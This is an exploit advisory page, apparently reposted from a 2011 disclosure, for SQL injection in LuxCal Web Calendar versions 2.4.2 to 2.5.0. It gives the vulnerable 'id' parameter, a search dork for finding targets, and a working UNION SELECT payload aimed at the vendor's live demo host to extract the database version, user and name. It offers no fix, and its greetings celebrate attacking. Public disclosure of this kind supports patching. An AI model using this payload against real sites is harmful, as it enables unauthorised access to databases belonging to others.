LuxCal Web Calendar v2.4.2 / v2.5.0 SQL Injection Vulnerability

2011.07.09
Credit: kaMtiEz
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

######## ## LuxCal Web Calendar v2.4.2 / v2.5.0 SQL Injection Vulnerability ## ## Author : kaMtiEz (kamtiez@exploit-id.com) ## ## Homepage : http://www.indonesiancoder.com / http://exploit-id.com / http://magelangcyber.web.id ## ## Date : 6 July, 2011 ## ######## [ Software Information ] [+] Vendor : http://www.luxsoft.eu [+] Download : http://www.luxsoft.eu/index.php?pge=dload [+] version : 2.4.2 - 2.5.0 or lower maybe also affected [+] Vulnerability : SQL INJECTION [+] Dork : "CiHuY" [+] LOCATION : INDONESIA - JOGJA ######## [ Vulnerable File ] http://127.0.0.1/[kaMtiEz]/index.php?xP=11&id=[num] [ XpL ] http://127.0.0.1/[kaMtiEz]/index.php?xP=11&id=[num] [ DEMO ] http://www.luxsoft.eu/luxcal/index.php?xP=11&id=-326415+union+all+select+1,2,@@version,user(),5,database(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- [ FIX ] dunno :"> ######## [ Thx TO ] [+] INDONESIANCODER - EXPLOIT-ID - MAGELANGCYBER TEAM - MALANGCYBER CREW - KILL-9 [+] Tukulesto,arianom,el-farhatz,Jundab,Ibl13Z,Ulow,s1do3L,Boebefa,Hmei7,RyanAby,AlbertWired,GonzHack,Z190T [+] Lagripe-Dz,KedAns-Dz,By_aGreSiF,t0r3x,Mboys,Contrex,Gh4mb4S,jos_ali_joe,k4l0ng666,n4sss,r3m1ck,k4mpr3t0 [+] yur4kh4,xr0b0t,kido,trycyber,n4ck0,Caddy-Dz dan teman2 semuanya yang saya tak bisa sebutkan satu2 :D [ NOTE ] [+] Stop Dreaming , Lets Do it ! [+] Jangan Takut , Luka Pasti Akan Sembuh :) [ QUOTE ] [+] INDONESIANCODER still r0x [+] nothing secure ..

References:

http://exploit-id.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top